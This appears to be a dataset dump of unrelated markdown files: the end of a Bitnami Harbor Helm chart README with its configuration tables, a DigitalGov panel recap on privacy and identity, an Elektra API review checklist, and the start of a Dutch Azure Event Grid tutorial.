| `exporter.readinessProbe.initialDelaySeconds` | Initial delay seconds for readinessProbe | `20` |
| `exporter.readinessProbe.periodSeconds` | Period seconds for readinessProbe | `10` |
| `exporter.readinessProbe.timeoutSeconds` | Timeout seconds for readinessProbe | `5` |
| `exporter.readinessProbe.failureThreshold` | Failure threshold for readinessProbe | `6` |
| `exporter.readinessProbe.successThreshold` | Success threshold for readinessProbe | `1` |
| `exporter.startupProbe.enabled` | Enable startupProbe on Harbor Exporter containers | `false` |
| `exporter.startupProbe.initialDelaySeconds` | Initial delay seconds for startupProbe | `5` |
| `exporter.startupProbe.periodSeconds` | Period seconds for startupProbe | `10` |
| `exporter.startupProbe.timeoutSeconds` | Timeout seconds for startupProbe | `1` |
| `exporter.startupProbe.failureThreshold` | Failure threshold for startupProbe | `15` |
| `exporter.startupProbe.successThreshold` | Success threshold for startupProbe | `1` |
| `exporter.customLivenessProbe` | Custom livenessProbe that overrides the default one | `{}` |
| `exporter.customReadinessProbe` | Custom readinessProbe that overrides the default one | `{}` |
| `exporter.customStartupProbe` | Custom startupProbe that overrides the default one | `{}` |
| `exporter.resources.limits` | The resources limits for the Harbor Exporter containers | `{}` |
| `exporter.resources.requests` | The requested resources for the Harbor Exporter containers | `{}` |
| `exporter.podSecurityContext.enabled` | Enabled Exporter pods' Security Context | `true` |
| `exporter.podSecurityContext.fsGroup` | Set Exporter pod's Security Context fsGroup | `1001` |
| `exporter.containerSecurityContext.enabled` | Enabled Exporter containers' Security Context | `true` |
| `exporter.containerSecurityContext.runAsUser` | Set Exporter containers' Security Context runAsUser | `1001` |
| `exporter.containerSecurityContext.runAsNonRoot` | Set Exporter containers' Security Context runAsNonRoot | `true` |
| `exporter.updateStrategy.type` | The update strategy for deployments with persistent volumes: RollingUpdate or Recreate. Set it as Recreate when RWM for volumes isn't supported | `RollingUpdate` |
| `exporter.updateStrategy.rollingUpdate` | Exporter deployment rolling update configuration parameters | `{}` |
| `exporter.lifecycleHooks` | LifecycleHook to set additional configuration at startup, e.g. LDAP settings via REST API. Evaluated as a template | `{}` |
| `exporter.hostAliases` | Exporter pods host aliases | `[]` |
| `exporter.podLabels` | Add additional labels to the pod (evaluated as a template) | `{}` |
| `exporter.podAnnotations` | Annotations to add to the exporter pod | `{}` |
| `exporter.podAffinityPreset` | Harbor Exporter Pod affinity preset. Ignored if `affinity` is set. Allowed values: `soft` or `hard` | `""` |
| `exporter.podAntiAffinityPreset` | Harbor Exporter Pod anti-affinity preset. Ignored if `affinity` is set. Allowed values: `soft` or `hard` | `soft` |
| `exporter.nodeAffinityPreset.type` | Harbor Exporter Node affinity preset type. Ignored if `exporter.affinity` is set. Allowed values: `soft` or `hard` | `""` |
| `exporter.nodeAffinityPreset.key` | Harbor Exporter Node label key to match Ignored if `exporter.affinity` is set. | `""` |
| `exporter.nodeAffinityPreset.values` | Harbor Exporter Node label values to match. Ignored if `exporter.affinity` is set. | `[]` |
| `exporter.affinity` | Harbor Exporter Affinity for pod assignment | `{}` |
| `exporter.priorityClassName` | Exporter pods Priority Class Name | `""` |
| `exporter.nodeSelector` | Harbor Exporter Node labels for pod assignment | `{}` |
| `exporter.tolerations` | Harbor Exporter Tolerations for pod assignment | `[]` |
| `exporter.topologySpreadConstraints` | Topology Spread Constraints for pod assignment spread across your cluster among failure-domains. Evaluated as a template | `{}` |
| `exporter.initContainers` | Add additional init containers to the pod (evaluated as a template) | `[]` |
| `exporter.extraVolumeMounts` | Optionally specify extra list of additional volumeMounts for the Chartmuseum pods | `[]` |
| `exporter.extraVolumes` | Optionally specify extra list of additional volumes for the Chartmuseum pods | `[]` |
| `exporter.sidecars` | Attach additional containers to the pod (evaluated as a template) | `[]` |
| `exporter.automountServiceAccountToken` | Automount service account token | `false` |
| `exporter.service.ports.metrics` | Exporter HTTP service port | `8001` |
### PostgreSQL Parameters
| Name | Description | Value |
| ------------------------------------------ | ------------------------------------------------------------------------------------------------------ | ------------------------------ |
| `postgresql.enabled` | Switch to enable or disable the PostgreSQL helm chart | `true` |
| `postgresql.auth.enablePostgresUser` | Assign a password to the "postgres" admin user. Otherwise, remote access will be blocked for this user | `true` |
| `postgresql.auth.postgresPassword` | Password for the "postgres" admin user | `not-secure-database-password` |
| `postgresql.auth.existingSecret` | Name of existing secret to use for PostgreSQL credentials | `""` |
| `postgresql.architecture` | PostgreSQL architecture (`standalone` or `replication`) | `standalone` |
| `postgresql.primary.extendedConfiguration` | Extended PostgreSQL Primary configuration (appended to main or default configuration) | `max_connections = 1024
` |
| `postgresql.primary.initdb.scripts` | Initdb scripts to create Harbor databases | `{}` |
| `postgresql.image.registry` | PostgreSQL image registry | `docker.io` |
| `postgresql.image.repository` | PostgreSQL image repository | `bitnami/postgresql` |
| `postgresql.image.tag` | PostgreSQL image tag (immutable tags are recommended) | `11.15.0-debian-10-r36` |
| `externalDatabase.host` | Database host | `localhost` |
| `externalDatabase.port` | Database port number | `5432` |
| `externalDatabase.user` | Non-root username for Harbor | `bn_harbor` |
| `externalDatabase.password` | Password for the non-root username for Harbor | `""` |
| `externalDatabase.sslmode` | External database ssl mode | `disable` |
| `externalDatabase.coreDatabase` | External database name for core | `""` |
| `externalDatabase.clairDatabase` | External database name for clair | `""` |
| `externalDatabase.clairUsername` | External database username for clair | `""` |
| `externalDatabase.clairPassword` | External database password for clair | `""` |
| `externalDatabase.notaryServerDatabase` | External database name for notary server | `""` |
| `externalDatabase.notaryServerUsername` | External database username for notary server | `""` |
| `externalDatabase.notaryServerPassword` | External database password for notary server | `""` |
| `externalDatabase.notarySignerDatabase` | External database name for notary signer | `""` |
| `externalDatabase.notarySignerUsername` | External database username for notary signer | `""` |
| `externalDatabase.notarySignerPassword` | External database password for notary signer | `""` |
### Redis™ parameters
| Name | Description | Value |
| ----------------------------------------- | ------------------------------------------------------------------------ | ------------ |
| `redis.enabled` | Switch to enable or disable the Redis™ helm | `true` |
| `redis.auth.enabled` | Enable password authentication | `false` |
| `redis.auth.password` | Redis™ password | `""` |
| `redis.auth.existingSecret` | The name of an existing secret with Redis™ credentials | `""` |
| `redis.architecture` | Redis™ architecture. Allowed values: `standalone` or `replication` | `standalone` |
| `externalRedis.host` | Redis™ host | `localhost` |
| `externalRedis.port` | Redis™ port number | `6379` |
| `externalRedis.password` | Redis™ password | `""` |
| `externalRedis.coreDatabaseIndex` | Index for core database | `0` |
| `externalRedis.jobserviceDatabaseIndex` | Index for jobservice database | `1` |
| `externalRedis.registryDatabaseIndex` | Index for registry database | `2` |
| `externalRedis.chartmuseumDatabaseIndex` | Index for chartmuseum database | `3` |
| `externalRedis.clairAdapterDatabaseIndex` | Index for chartmuseum database | `4` |
| `externalRedis.trivyAdapterDatabaseIndex` | Index for chartmuseum database | `5` |
| `externalRedis.sentinel.enabled` | If external redis with sentinal is used, set it to `true` | `false` |
| `externalRedis.sentinel.masterSet` | Name of sentinel masterSet if sentinel is used | `mymaster` |
| `externalRedis.sentinel.hosts` | Sentinel hosts and ports in the format | `""` |
### Harbor metrics parameters
| Name | Description | Value |
| ------------------------------------------ | ------------------------------------------------------------------------------------------------- | ---------- |
| `metrics.enabled` | Whether or not to enable metrics for different | `false` |
| `metrics.path` | Path where metrics are exposed | `/metrics` |
| `metrics.serviceMonitor.enabled` | if `true`, creates a Prometheus Operator ServiceMonitor (requires `metrics.enabled` to be `true`) | `false` |
| `metrics.serviceMonitor.namespace` | Namespace in which Prometheus is running | `""` |
| `metrics.serviceMonitor.interval` | Interval at which metrics should be scraped | `""` |
| `metrics.serviceMonitor.scrapeTimeout` | Timeout after which the scrape is ended | `""` |
| `metrics.serviceMonitor.labels` | Additional labels that can be used so ServiceMonitor will be discovered by Prometheus | `{}` |
| `metrics.serviceMonitor.selector` | Prometheus instance selector labels | `{}` |
| `metrics.serviceMonitor.relabelings` | RelabelConfigs to apply to samples before scraping | `[]` |
| `metrics.serviceMonitor.metricRelabelings` | MetricRelabelConfigs to apply to samples before ingestion | `[]` |
| `metrics.serviceMonitor.honorLabels` | Specify honorLabels parameter to add the scrape endpoint | `false` |
| `metrics.serviceMonitor.jobLabel` | The name of the label on the target service to use as the job name in prometheus. | `""` |
Specify each parameter using the `--set key=value[,key=value]` argument to `helm install`. For example,
```console
$ helm install my-release \
--set adminPassword=password \
bitnami/harbor
```
The above command sets the Harbor administrator account password to `password`.
> NOTE: Once this chart is deployed, it is not possible to change the application's access credentials, such as usernames or passwords, using Helm. To change these application credentials after deployment, delete any persistent volumes (PVs) used by the chart and re-deploy it, or use the application's built-in administrative tools if available.
Alternatively, a YAML file that specifies the values for the above parameters can be provided while installing the chart. For example,
```console
$ helm install my-release -f values.yaml bitnami/harbor
```
## Configuration and installation details
### [Rolling VS Immutable tags](https://docs.bitnami.com/containers/how-to/understand-rolling-tags-containers/)
It is strongly recommended to use immutable tags in a production environment. This ensures your deployment does not change automatically if the same tag is updated with a different image.
Bitnami will release a new chart updating its containers if a new version of the main container, significant changes, or critical vulnerabilities exist.
### Configure the way how to expose Harbor core
You can expose Harbor core using two methods:
- An Ingress Controller, `exposureType` should be set to `ingress`.
- An ingress controller must be installed in the Kubernetes cluster.
- If the TLS is disabled, the port must be included in the command when pulling/pushing images. Refer to issue [#5291](https://github.com/goharbor/harbor/issues/5291) for the detail.
- An NGINX Proxy, `exposureType` should be set to `proxy`. There are three ways to do so depending on the NGINX Proxy service type:
- **ClusterIP**: Exposes the service on a cluster-internal IP. Choosing this value makes the service only reachable from within the cluster:
- **NodePort**: Exposes the service on each Node's IP at a static port (the NodePort). You'll be able to contact the NodePort service, from outside the cluster, by requesting `NodeIP:NodePort`.
- **LoadBalancer**: Exposes the service externally using a cloud provider's load balancer.
### Configure the external URL
The external URL for Harbor core service is used to:
1. populate the docker/helm commands showed on portal
2. populate the token service URL returned to docker/notary client
Format: `protocol://domain[:port]`. Usually:
- if expose Harbor core service via Ingress, the `domain` should be the value of `ingress.core.hostname`.
- if expose Harbor core via NGINX proxy using a `ClusterIP` service type, the `domain` should be the value of `service.clusterIP`.
- if expose Harbor core via NGINX proxy using a `NodePort` service type, the `domain` should be the IP address of one Kubernetes node.
- if expose Harbor core via NGINX proxy using a `LoadBalancer` service type, set the `domain` as your own domain name and add a CNAME record to map the domain name to the one you got from the cloud provider.
If Harbor is deployed behind the proxy, set it as the URL of proxy.
### Sidecars and Init Containers
If you have a need for additional containers to run within the same pod as any of the Harbor components (e.g. an additional metrics or logging exporter), you can do so via the `sidecars` config parameter inside each component subsection. Simply define your container according to the Kubernetes container spec.
```yaml
core:
sidecars:
- name: your-image-name
image: your-image
imagePullPolicy: Always
ports:
- name: portname
containerPort: 1234
```
Similarly, you can add extra init containers using the `initContainers` parameter.
```yaml
core:
initContainers:
- name: your-image-name
image: your-image
imagePullPolicy: Always
ports:
- name: portname
containerPort: 1234
```
### Adding extra environment variables
In case you want to add extra environment variables (useful for advanced operations like custom init scripts), you can use the `extraEnvVars` property inside each component subsection.
```yaml
core:
extraEnvVars:
- name: LOG_LEVEL
value: error
```
Alternatively, you can use a ConfigMap or a Secret with the environment variables. To do so, use the `extraEnvVarsCM` or the `extraEnvVarsSecret` values inside each component subsection.
### Configure data persistence
- **Disable**: The data does not survive the termination of a pod.
- **Persistent Volume Claim(default)**: A default `StorageClass` is needed in the Kubernetes cluster to dynamically provision the volumes. Specify another StorageClass in the `storageClass` or set `existingClaim` if you have already existing persistent volumes to use.
- **External Storage(only for images and charts)**: For images and charts, the external storages are supported: `azure`, `gcs`, `s3` `swift` and `oss`.
### Configure the secrets
- **Secret keys**: Secret keys are used for secure communication between components. Fill `core.secret`, `jobservice.secret` and `registry.secret` to configure.
- **Certificates**: Used for token encryption/decryption. Fill `core.secretName` to configure.
Secrets and certificates must be setup to avoid changes on every Helm upgrade (see: [#107](https://github.com/goharbor/harbor-helm/issues/107)).
### Setting Pod's affinity
This chart allows you to set your custom affinity using the `XXX.affinity` parameter(s). Find more information about Pod's affinity in the [kubernetes documentation](https://kubernetes.io/docs/concepts/configuration/assign-pod-node/#affinity-and-anti-affinity).
As an alternative, you can use of the preset configurations for pod affinity, pod anti-affinity, and node affinity available at the [bitnami/common](https://github.com/bitnami/charts/tree/master/bitnami/common#affinities) chart. To do so, set the `XXX.podAffinityPreset`, `XXX.podAntiAffinityPreset`, or `XXX.nodeAffinityPreset` parameters.
### Adjust permissions of persistent volume mountpoint
As the images run as non-root by default, it is necessary to adjust the ownership of the persistent volumes so that the containers can write data into it.
By default, the chart is configured to use Kubernetes Security Context to automatically change the ownership of the volume. However, this feature does not work in all Kubernetes distributions.
As an alternative, this chart supports using an initContainer to change the ownership of the volume before mounting it in the final destination.
You can enable this initContainer by setting `volumePermissions.enabled` to `true`.
## Troubleshooting
Find more information about how to deal with common errors related to Bitnami's Helm charts in [this troubleshooting guide](https://docs.bitnami.com/general/how-to/troubleshoot-helm-chart-issues).
## Upgrading
Refer to the [chart documentation for more information about how to upgrade from previous releases](https://docs.bitnami.com/kubernetes/infrastructure/harbor/administration/upgrade/).
## License
Copyright © 2022 Bitnami
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License. | 239.510638 | 451 | 0.274114 | eng_Latn | 0.763388 |
9723b6c9ccae4de4cdab3b6566043ec71ce7ca85 | 3,657 | md | Markdown | content/news/2015/08/2015-08-28-digitalgov-summit-recap-building-privacy-identity-management-in-the-open.md | afeijoo/digitalgov.gov | 117098d31802464d9696987980f4a400f3f6654c | [
"CC0-1.0"
] | 1 | 2022-01-23T11:31:14.000Z | 2022-01-23T11:31:14.000Z | content/news/2015/08/2015-08-28-digitalgov-summit-recap-building-privacy-identity-management-in-the-open.md | afeijoo/digitalgov.gov | 117098d31802464d9696987980f4a400f3f6654c | [
"CC0-1.0"
] | null | null | null | content/news/2015/08/2015-08-28-digitalgov-summit-recap-building-privacy-identity-management-in-the-open.md | afeijoo/digitalgov.gov | 117098d31802464d9696987980f4a400f3f6654c | [
"CC0-1.0"
] | null | null | null | ---
slug: digitalgov-summit-recap-building-privacy-identity-management-in-the-open
date: 2015-08-28 10:00:32 -0400
title: 'DigitalGov Summit Recap: Building Privacy & Identity Management in the Open'
summary: 'How can government protect citizens while delivering the services they demand in the modern age? This was a theme of the panel discussion on privacy and identity management at the 2015 DigitalGov Citizen Services Summit. “Cybersecurity has really come a long way in the last 10 years, unifying the conversation about risk across organizations,” said'
authors:
- andreanocesigritz
topics:
- our-work
- digitalgov-summit
- DOT
- national-institute-of-standards-and-technology
- NIST
- recaps
- united-states-department-of-transportation
---
{{< legacy-img src="2015/08/600-x-400-Cyber-Attack-A01-Matej-Moderc-iStock-Thinkstock-479801072.jpg" alt="Data and identity security concept of cyber attack warning messages on a computer screen." caption="" >}}
How can government protect citizens while delivering the services they demand in the modern age? This was a theme of the panel discussion on privacy and identity management at the [2015 DigitalGov Citizen Services Summit]({{< ref "2015-06-12-digitalgov-citizen-services-summit-reflections-from-our-livestream-host-and-full-recording-now-available.md" >}}).
“Cybersecurity has really come a long way in the last 10 years, unifying the conversation about risk across organizations,” said Sean Brooks, panelist and privacy engineer at the National Institute of Standards and Technology (NIST), “but privacy has really lagged behind.” And NIST is trying to help agencies understand the risks they’re trying to mitigate with controls in their information systems, Brooks added.
Government also needs to think about user experience because consumers want convenience and trust, said Jennifer Kerber, director of [Connect.gov](https://www.connect.gov/) at the General Services Administration. By doing user testing and research in the early stages, we can ensure we’ll deliver digital services in a common lexicon that customers can understand, she explained.
{{< legacy-img src="2015/02/600-x-286-Before-and-With-ConnectGov.jpg" alt="On the left, it shows 3 examples of how without Connect.gov, you can only use an agency-issued credential for access to that agency’s applications. On the right, it shows how Connect.gov enables you to use a single third-party credential to access multiple agencies’ applications." >}}
Government can “build all these beautiful digital services, but if people don’t trust them, they aren’t going to use them—and if they have to use them in order to do business with us, we would like to tamp down their fear and concern” said Dan Morgan, panel moderator and chief data officer at the Department of Transportation. “It’s very important we address these user experience things early on and make sure the people who are building these services understand what we’re trying to do and how best to address these risks,” he continued.
NIST’s draft publication on privacy engineering framework will be going out for public comment, and it will be critical to get comments from people “trying to build stuff and do things” at agencies, Brooks said. One of the goals of the privacy engineering framework is to make communication across different staff at agencies more productive. It will contain worksheets that will help facilitate an iterative approach to this work in agencies.
You can watch the video below to see the rest of the 15 minute panel.
[youtube=http://www.youtube.com/watch?v=KjlYjkXzFzM&w=600] | 107.558824 | 547 | 0.79382 | eng_Latn | 0.997287 |
9723dc27bb6668e58a4697cfcaedbe27c428e06b | 3,102 | md | Markdown | doc/api_review/core/keyIsDirectlyBelow.md | dev2718/libelektra | cd581101febbc8ee2617243d0d93f871ef2fae88 | [
"BSD-3-Clause"
] | null | null | null | doc/api_review/core/keyIsDirectlyBelow.md | dev2718/libelektra | cd581101febbc8ee2617243d0d93f871ef2fae88 | [
"BSD-3-Clause"
] | null | null | null | doc/api_review/core/keyIsDirectlyBelow.md | dev2718/libelektra | cd581101febbc8ee2617243d0d93f871ef2fae88 | [
"BSD-3-Clause"
] | null | null | null | # keyIsDirectlyBelow
- start = 2021-03-07 19:10
- end = 2021-03-07 19:20
- reviewer = Stefan Hanreich <[email protected]>
## Signature
`int keyIsDirectlyBelow(const Key *key, const Key *check)`
## Checklist
#### Doxygen
(bullet points are in order of appearance)
- [x] First line explains briefly what the function does
- [ ] Simple example or snippet how to use the function
- [ ] split examples
- [ ] turn examples into proper code
- [ ] Longer description of function containing common use cases
- [ ] move description from examples to documentation body
- [x] Description of functions reads nicely
- [ ] `@pre`
- [ ] add
- [ ] `@post`
- [ ] add
- [ ] `@invariant`
- [ ] add
- [x] `@param` for every parameter
- [ ] `@return` / `@retval`
- [ ] 'check is below key' -> 'check is directly below key'
- [ ] `@since`
- [ ] add
- [x] `@ingroup`
- [ ] `@see`
- [ ] split and add descriptions
### Naming
- Abbreviations used in function names must be defined in the
[Glossary](/doc/help/elektra-glossary.md)
- [x] Function names should neither be too long, nor too short
- [x] Function name should be clear and unambiguous
- Abbreviations used in parameter names must be defined in the
[Glossary](/doc/help/elektra-glossary.md)
- [x] Parameter names should neither be too long, nor too short
- [ ] Parameter names should be clear and unambiguous
- [ ] the name of `check` might be improved
### Compatibility
(only in PRs)
- [Symbol versioning](/doc/dev/symbol-versioning.md)
is correct for breaking changes
- ABI/API changes are forward-compatible (breaking backwards-compatibility
to add additional symbols is fine)
### Parameter & Return Types
- [x] Function parameters should use enum types instead of boolean types
wherever sensible
- [x] Wherever possible, function parameters should be `const`
- [x] Wherever possible, return types should be `const`
- [x] Functions should have the least amount of parameters feasible
### Structural Clarity
- [x] Functions should do exactly one thing
- [x] Function name has the appropriate prefix
- [ ] Order of signatures in kdb.h.in is the same as Doxygen
- [ ] swapped with `keyIsBelowOrSame()`
- [x] No functions with similar purpose exist
### Memory Management
- [x] Memory Management should be handled by the function wherever possible
### Extensibility
- [x] Function is easily extensible, e.g., with flags
- [x] Documentation does not impose limits, that would hinder further extensions
### Tests
- [ ] Function code is fully covered by tests
- [ ] Line 293
- [ ] Line 326
- [ ] All possible error states are covered by tests
- [ ] Line 293 seems to be checked
- [ ] Line 326 seems to be checked
- All possible enum values are covered by tests
- [x] No inconsistencies between tests and documentation
## Summary
## Other Issues discovered (unrelated to function)
- [ ] `keyIsBelowOrSame` is not contained in Doxygen
- [ ] maybe merge `keyBelowFamily` into one function with flags
| 30.411765 | 80 | 0.683752 | eng_Latn | 0.995022 |
97240df82ae93040c4b006788bdf416b6fd2c6a8 | 7,912 | md | Markdown | docs/standard/data/xml/traversing-xml-schemas.md | Youssef1313/docs.it-it | 15072ece39fae71ee94a8b9365b02b550e68e407 | [
"CC-BY-4.0",
"MIT"
] | null | null | null | docs/standard/data/xml/traversing-xml-schemas.md | Youssef1313/docs.it-it | 15072ece39fae71ee94a8b9365b02b550e68e407 | [
"CC-BY-4.0",
"MIT"
] | null | null | null | docs/standard/data/xml/traversing-xml-schemas.md | Youssef1313/docs.it-it | 15072ece39fae71ee94a8b9365b02b550e68e407 | [
"CC-BY-4.0",
"MIT"
] | null | null | null | ---
title: Attraversamento di schemi XML
ms.date: 03/30/2017
ms.technology: dotnet-standard
dev_langs:
- csharp
- vb
- cpp
ms.assetid: cce69574-5861-4a30-b730-2e18d915d8ee
author: mairaw
ms.author: mairaw
ms.openlocfilehash: 6040a7aa8f3244ea0ce2e66042537bc45c347b05
ms.sourcegitcommit: 581ab03291e91983459e56e40ea8d97b5189227e
ms.translationtype: HT
ms.contentlocale: it-IT
ms.lasthandoff: 08/27/2019
ms.locfileid: "70037846"
---
# <a name="traversing-xml-schemas"></a>Attraversamento di schemi XML
L'attraversamento di uno schema XML mediante l'API del modello SOM (Schema Object Model) consente di accedere a elementi, attributi e tipi archiviati nel modello SOM. Tale attraversamento rappresenta inoltre il primo passaggio per la modifica di uno schema XML tramite l'API del modello SOM.
## <a name="traversing-an-xml-schema"></a>Attraversamento di uno schema XML
Le seguenti proprietà della classe <xref:System.Xml.Schema.XmlSchema> forniscono l'accesso alla raccolta degli elementi globali aggiunti a XML Schema.
|Proprietà|Tipo di oggetto archiviato nella raccolta o nella matrice|
|--------------|---------------------------------------------------|
|<xref:System.Xml.Schema.XmlSchema.Elements%2A>|<xref:System.Xml.Schema.XmlSchemaElement>|
|<xref:System.Xml.Schema.XmlSchema.Attributes%2A>|<xref:System.Xml.Schema.XmlSchemaAttribute>|
|<xref:System.Xml.Schema.XmlSchema.AttributeGroups%2A>|<xref:System.Xml.Schema.XmlSchemaAttributeGroup>|
|<xref:System.Xml.Schema.XmlSchema.Groups%2A>|<xref:System.Xml.Schema.XmlSchemaGroup>|
|<xref:System.Xml.Schema.XmlSchema.Includes%2A>|<xref:System.Xml.Schema.XmlSchemaExternal>, <xref:System.Xml.Schema.XmlSchemaInclude>, <xref:System.Xml.Schema.XmlSchemaImport> o <xref:System.Xml.Schema.XmlSchemaRedefine>|
|<xref:System.Xml.Schema.XmlSchema.Items%2A>|<xref:System.Xml.Schema.XmlSchemaObject> (fornisce l'accesso a elementi, attributi e tipi a livello globale).|
|<xref:System.Xml.Schema.XmlSchema.Notations%2A>|<xref:System.Xml.Schema.XmlSchemaNotation>|
|<xref:System.Xml.Schema.XmlSchema.SchemaTypes%2A>|<xref:System.Xml.Schema.XmlSchemaType>, <xref:System.Xml.Schema.XmlSchemaSimpleType>, <xref:System.Xml.Schema.XmlSchemaComplexType>|
|<xref:System.Xml.Schema.XmlSchema.UnhandledAttributes%2A>|<xref:System.Xml.XmlAttribute> (fornisce l'accesso agli attributi che non appartengono allo spazio dei nomi dello schema).|
> [!NOTE]
> Tutte le proprietà elencate nella precedente tabella, a eccezione della proprietà <xref:System.Xml.Schema.XmlSchema.Items%2A>, sono proprietà PSCI (Post-Schema-Compilation-Infoset) che non sono disponibili fino a quando lo schema non è stato compilato. La proprietà <xref:System.Xml.Schema.XmlSchema.Items%2A> è una proprietà precedente alla compilazione dello schema che può essere usata prima che lo schema venga compilato per accedere e apportare modifiche a elementi, attributi e tipi a livello globale.
>
> La proprietà <xref:System.Xml.Schema.XmlSchema.UnhandledAttributes%2A> fornisce l'accesso agli attributi che non appartengono allo spazio dei nomi dello schema. Tali attributi non vengono elaborati dal processore dello schema.
Nel seguente esempio di codice viene illustrato l'attraversamento dello schema del cliente creato nell'argomento [Compilazione di XML Schema](../../../../docs/standard/data/xml/building-xml-schemas.md). Nell'esempio di codice viene eseguito l'attraversamento dello schema usando le raccolte descritte in precedenza e tutti gli elementi e attributi dello schema vengono scritti nella console.
L'esempio consente di attraversare lo schema del cliente eseguendo i passaggi seguenti.
1. Aggiunge lo schema del cliente a un nuovo oggetto <xref:System.Xml.Schema.XmlSchemaSet>, quindi lo compila. Eventuali avvisi ed errori di convalida dello schema rilevati durante la lettura e la compilazione dello schema vengono gestiti dal delegato <xref:System.Xml.Schema.ValidationEventHandler>.
2. Recupera l'oggetto <xref:System.Xml.Schema.XmlSchema> compilato dal tipo <xref:System.Xml.Schema.XmlSchemaSet> scorrendo la proprietà <xref:System.Xml.Schema.XmlSchemaSet.Schemas%2A>. Dal momento che lo schema è stato compilato, è possibile accedere alle proprietà di PSCI (Post-Schema-Compilation-Infoset).
3. Scorre ciascun tipo <xref:System.Xml.Schema.XmlSchemaElement> nella raccolta <xref:System.Xml.Schema.XmlSchemaObjectTable.Values%2A> della raccolta <xref:System.Xml.Schema.XmlSchema.Elements%2A?displayProperty=nameWithType> successiva alla compilazione dello schema e scrive il nome di ciascun elemento nella console.
4. Ottiene il tipo complesso dell'elemento `Customer` usando la classe <xref:System.Xml.Schema.XmlSchemaComplexType>.
5. Se il tipo complesso dispone di attributi, ottiene un tipo <xref:System.Collections.IDictionaryEnumerator> per enumerare ciascun tipo <xref:System.Xml.Schema.XmlSchemaAttribute> e scrive il relativo nome nella console.
6. Ottiene la particella di sequenza del tipo complesso usando la classe <xref:System.Xml.Schema.XmlSchemaSequence>.
7. Scorre ciascun tipo <xref:System.Xml.Schema.XmlSchemaElement> nella raccolta <xref:System.Xml.Schema.XmlSchemaSequence.Items%2A?displayProperty=nameWithType> e scrive il nome di ciascun elemento figlio nella console.
Di seguito è riportato l'esempio di codice completo.
[!code-cpp[XmlSchemaTraverseExample#1](../../../../samples/snippets/cpp/VS_Snippets_Data/XmlSchemaTraverseExample/CPP/XmlSchemaTraverseExample.cpp#1)]
[!code-csharp[XmlSchemaTraverseExample#1](../../../../samples/snippets/csharp/VS_Snippets_Data/XmlSchemaTraverseExample/CS/XmlSchemaTraverseExample.cs#1)]
[!code-vb[XmlSchemaTraverseExample#1](../../../../samples/snippets/visualbasic/VS_Snippets_Data/XmlSchemaTraverseExample/VB/XmlSchemaTraverseExample.vb#1)]
Se è un tipo semplice o un tipo complesso definito dall'utente, il tipo della proprietà <xref:System.Xml.Schema.XmlSchemaElement.ElementSchemaType%2A?displayProperty=nameWithType> può essere <xref:System.Xml.Schema.XmlSchemaSimpleType> o <xref:System.Xml.Schema.XmlSchemaComplexType>. Se è uno dei tipi di dati incorporati definiti nella raccomandazione W3C relativa agli schemi XML, il tipo della proprietà può essere anche <xref:System.Xml.Schema.XmlSchemaDatatype>. Nello schema del cliente, il tipo della proprietà <xref:System.Xml.Schema.XmlSchemaElement.ElementSchemaType%2A> dell'elemento `Customer` è <xref:System.Xml.Schema.XmlSchemaComplexType> e il tipo degli elementi `FirstName` e `LastName` è <xref:System.Xml.Schema.XmlSchemaSimpleType>.
Nell'esempio di codice dell'argomento [Compilazione di XML Schema](../../../../docs/standard/data/xml/building-xml-schemas.md) è stata usata la raccolta <xref:System.Xml.Schema.XmlSchemaComplexType.Attributes%2A?displayProperty=nameWithType> per aggiungere l'attributo `CustomerId` all'elemento `Customer`. Questa è una proprietà precedente alla compilazione dello schema. La proprietà PSCI corrispondente è la raccolta <xref:System.Xml.Schema.XmlSchemaComplexType.AttributeUses%2A?displayProperty=nameWithType>, che contiene tutti gli attributi del tipo complesso, inclusi quelli ereditati tramite una derivazione del tipo.
## <a name="see-also"></a>Vedere anche
- [Panoramica del modello SOM XML](../../../../docs/standard/data/xml/xml-schema-object-model-overview.md)
- [Lettura e scrittura di schemi XML](../../../../docs/standard/data/xml/reading-and-writing-xml-schemas.md)
- [Compilazione di schemi XML](../../../../docs/standard/data/xml/building-xml-schemas.md)
- [Modifica di schemi XML](../../../../docs/standard/data/xml/editing-xml-schemas.md)
- [Inclusione o importazione di schemi XML](../../../../docs/standard/data/xml/including-or-importing-xml-schemas.md)
- [XmlSchemaSet per la compilazione di schemi](../../../../docs/standard/data/xml/xmlschemaset-for-schema-compilation.md)
- [Post-Schema-Validation Infoset (PSVI)](../../../../docs/standard/data/xml/post-schema-compilation-infoset.md)
| 97.679012 | 752 | 0.797144 | ita_Latn | 0.881562 |
9724642ac86bd2f560301acbc5143e16392e9d1e | 9,283 | md | Markdown | articles/event-grid/edge/pub-sub-events-webhook-cloud.md | mtaheij/azure-docs.nl-nl | 6447611648064a057aae926a62fe8b6d854e3ea6 | [
"CC-BY-4.0",
"MIT"
] | null | null | null | articles/event-grid/edge/pub-sub-events-webhook-cloud.md | mtaheij/azure-docs.nl-nl | 6447611648064a057aae926a62fe8b6d854e3ea6 | [
"CC-BY-4.0",
"MIT"
] | null | null | null | articles/event-grid/edge/pub-sub-events-webhook-cloud.md | mtaheij/azure-docs.nl-nl | 6447611648064a057aae926a62fe8b6d854e3ea6 | [
"CC-BY-4.0",
"MIT"
] | null | null | null | ---
title: Publiceren, abonneren op gebeurtenissen in Cloud-Azure Event Grid IoT Edge | Microsoft Docs
description: Publiceren, abonneren op gebeurtenissen in de Cloud met behulp van een webhook met Event Grid op IoT Edge
author: VidyaKukke
manager: rajarv
ms.author: vkukke
ms.reviewer: spelluru
ms.date: 07/08/2020
ms.topic: article
ms.custom: devx-track-csharp
ms.openlocfilehash: 12bcb54f4bfdf17209324febeba380ff7789fc0f
ms.sourcegitcommit: 419cf179f9597936378ed5098ef77437dbf16295
ms.translationtype: MT
ms.contentlocale: nl-NL
ms.lasthandoff: 08/27/2020
ms.locfileid: "88998982"
---
# <a name="tutorial-publish-subscribe-to-events-in-cloud"></a>Zelf studie: publiceren, abonneren op gebeurtenissen in de Cloud
In dit artikel worden alle stappen beschreven die nodig zijn voor het publiceren en abonneren op gebeurtenissen met behulp van Event Grid op IoT Edge. Deze zelf studie maakt gebruik van en Azure function als gebeurtenis-handler. Zie voor aanvullende doel typen [gebeurtenis-handlers](event-handlers.md).
